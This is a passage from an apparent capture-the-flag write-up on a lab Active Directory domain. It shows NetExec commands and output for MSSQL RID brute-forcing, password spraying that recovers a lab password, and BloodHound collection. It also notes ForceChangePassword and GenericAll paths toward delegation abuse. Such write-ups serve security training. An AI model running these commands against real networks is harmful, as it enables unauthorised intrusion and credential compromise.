https://substackcdn.com/image/fetch/$s_!qxXi!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!qxXi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png" width="1920" height="507" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:507,&quot;width&quot;:1920,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:1204638,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2f56f23b-1e52-46dc-b83e-fc9569a905e7_1920x910.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!qxXi!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 424w, https://substackcdn.com/image/fetch/$s_!qxXi!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 848w, https://substackcdn.com/image/fetch/$s_!qxXi!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 1272w, https://substackcdn.com/image/fetch/$s_!qxXi!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4258dcf0-4aff-4130-b8a3-5edf6becc5d9_1920x507.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>So yeah, RID identification it is.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --rid-brute --local-auth
MSSQL       10.129.194.125  1433   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (EncryptionReq:False)
MSSQL       10.129.194.125  1433   DC               [+] DC\SQLGuest:zDPBpaF4FywlqIv11vii 
MSSQL       10.129.194.125  1433   DC               498: REDELEGATE\Enterprise Read-only Domain Controllers
MSSQL       10.129.194.125  1433   DC               500: WIN-Q13O908QBPG\Administrator
MSSQL       10.129.194.125  1433   DC               501: REDELEGATE\Guest
MSSQL       10.129.194.125  1433   DC               502: REDELEGATE\krbtgt
MSSQL       10.129.194.125  1433   DC               512: REDELEGATE\Domain Admins
MSSQL       10.129.194.125  1433   DC               513: REDELEGATE\Domain Users
MSSQL       10.129.194.125  1433   DC               514: REDELEGATE\Domain Guests
MSSQL       10.129.194.125  1433   DC               515: REDELEGATE\Domain Computers
MSSQL       10.129.194.125  1433   DC               516: REDELEGATE\Domain Controllers
MSSQL       10.129.194.125  1433   DC               517: REDELEGATE\Cert Publishers
MSSQL       10.129.194.125  1433   DC               518: REDELEGATE\Schema Admins
MSSQL       10.129.194.125  1433   DC               519: REDELEGATE\Enterprise Admins
MSSQL       10.129.194.125  1433   DC               520: REDELEGATE\Group Policy Creator Owners
MSSQL       10.129.194.125  1433   DC               521: REDELEGATE\Read-only Domain Controllers
MSSQL       10.129.194.125  1433   DC               522: REDELEGATE\Cloneable Domain Controllers
MSSQL       10.129.194.125  1433   DC               525: REDELEGATE\Protected Users
MSSQL       10.129.194.125  1433   DC               526: REDELEGATE\Key Admins
MSSQL       10.129.194.125  1433   DC               527: REDELEGATE\Enterprise Key Admins
MSSQL       10.129.194.125  1433   DC               553: REDELEGATE\RAS and IAS Servers
MSSQL       10.129.194.125  1433   DC               571: REDELEGATE\Allowed RODC Password Replication Group
MSSQL       10.129.194.125  1433   DC               572: REDELEGATE\Denied RODC Password Replication Group
MSSQL       10.129.194.125  1433   DC               1000: REDELEGATE\SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
MSSQL       10.129.194.125  1433   DC               1002: REDELEGATE\DC$
MSSQL       10.129.194.125  1433   DC               1103: REDELEGATE\FS01$
MSSQL       10.129.194.125  1433   DC               1104: REDELEGATE\Christine.Flanders
MSSQL       10.129.194.125  1433   DC               1105: REDELEGATE\Marie.Curie
MSSQL       10.129.194.125  1433   DC               1106: REDELEGATE\Helen.Frost
MSSQL       10.129.194.125  1433   DC               1107: REDELEGATE\Michael.Pontiac
MSSQL       10.129.194.125  1433   DC               1108: REDELEGATE\Mallory.Roberts
MSSQL       10.129.194.125  1433   DC               1109: REDELEGATE\James.Dinkleberg
MSSQL       10.129.194.125  1433   DC               1112: REDELEGATE\Helpdesk
MSSQL       10.129.194.125  1433   DC               1113: REDELEGATE\IT
MSSQL       10.129.194.125  1433   DC               1114: REDELEGATE\Finance
MSSQL       10.129.194.125  1433   DC               1115: REDELEGATE\DnsAdmins
MSSQL       10.129.194.125  1433   DC               1116: REDELEGATE\DnsUpdateProxy
MSSQL       10.129.194.125  1433   DC               1117: REDELEGATE\Ryan.Cooper
MSSQL       10.129.194.125  1433   DC               1119: REDELEGATE\sql_svc</code></pre></div><p>So in finals, this is our users collections:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec mssql dc.redelegate.vl -u SQLGuest -p zDPBpaF4FywlqIv11vii --local-auth --rid-brute 2000 | awk -F'\\\\' '{print $2}' | awk '{print $1}' | grep -v '\$$' | sort -u

Administrator
Allowed
Cert
Christine.Flanders
Cloneable
Denied
DnsAdmins
DnsUpdateProxy
Domain
Enterprise
Finance
Group
Guest
Helen.Frost
Helpdesk
IT
James.Dinkleberg
Key
krbtgt
Mallory.Roberts
Marie.Curie
Michael.Pontiac
Protected
RAS
Read-only
Ryan.Cooper
Schema
SQLGuest:zDPBpaF4FywlqIv11vii
SQLServer2005SQLBrowserUser$WIN-Q13O908QBPG
sql_svc</code></pre></div><p>And after re-force everything of usernames and password we got another match of:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc.redelegate.vl -u users.txt -p passwd.txt --continue-on-success | grep "[+]"
LDAP                     10.129.194.125  389    DC               [+] redelegate.vl\Marie.Curie:Fall2024! 

&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc.redelegate.vl -u Marie.Curie -p 'Fall2024!'
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\Marie.Curie:Fall2024!</code></pre></div><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">user: Marie.Curie 
passwd: Fall2024!</code></pre></div><p>And this one can be used in:</p><ul><li><p>SMB</p></li><li><p>LDAP</p></li><li><p>and more</p></li></ul><ol start="5"><li><p><em>Active Directory BloodHound</em></p></li></ol><p>I&#8217;ll just use NetExec as Collectors:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(byt3n33dl3&#12927;kali)-[~]
&#9492;&#9472;$ sudo netexec ldap dc.redelegate.vl -u Marie.Curie -p 'Fall2024!' --bloodhound -c all --dns-server 10.129.194.125                                                                                                                        
LDAP        10.129.194.125  389    DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:redelegate.vl) (signing:None) (channel binding:No TLS cert) 
LDAP        10.129.194.125  389    DC               [+] redelegate.vl\Marie.Curie:Fall2024! 
LDAP        10.129.194.125  389    DC               Resolved collection methods: trusts, container, objectprops, rdp, dcom, session, psremote, localadmin, group, acl
LDAP        10.129.194.125  389    DC               Done in 0M 25S
LDAP        10.129.194.125  389    DC               Compressing output into /root/.nxc/logs/DC_10.129.194.125_2026-04-04_033811_bloodhound.zip</code></pre></div><p>Let&#8217;s see the attack-paths</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!4WYq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!4WYq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!4WYq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!4WYq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!4WYq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!4WYq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png" width="1456" height="691" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:691,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:168394,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!4WYq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!4WYq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!4WYq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!4WYq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F46656e42-ffd2-48d9-85b2-354181e4c9d7_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Dope, 6 OOB!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Rc3m!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Rc3m!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!Rc3m!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!Rc3m!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!Rc3m!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Rc3m!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png" width="1922" height="912" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:912,&quot;width&quot;:1922,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:234238,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdd48f6d1-9694-40e2-bad4-4035a42a9219_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Rc3m!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!Rc3m!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!Rc3m!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!Rc3m!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F48def75a-8c7c-4fdb-831c-97b8ed2bd4b6_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Wow, after some enumeration only one ChangePassword is usefull:</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!CXBd!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!CXBd!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!CXBd!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!CXBd!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!CXBd!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!CXBd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png" width="1922" height="912" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:912,&quot;width&quot;:1922,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:224060,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/193146643?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2e371256-60c1-45de-b694-a7d46b5f070f_1922x912.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!CXBd!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!CXBd!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!CXBd!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!CXBd!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa57b8e88-da4e-4221-83f5-a2230d824f58_1922x912.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Yes, her!</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">Helen.Frost</code></pre></div><p>Further access, Helen.Frost gain &#8220;GenericAll&#8220; to FS01 Computer accounts, leading to potential Delegations, could be RBCD!</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!zL3E!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!zL3E!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 424w, https://substackcdn.com/image/fetch/$s_!zL3E!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 848w, https://substackcdn.com/image/fetch/$s_!zL3E!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 1272w, https://substackcdn.com/image/fetch/$s_!zL3E!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!zL3E!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa22a65f6-5084-42b4-90b3-160708767b98_1922x912.png" width="1922" height="912" 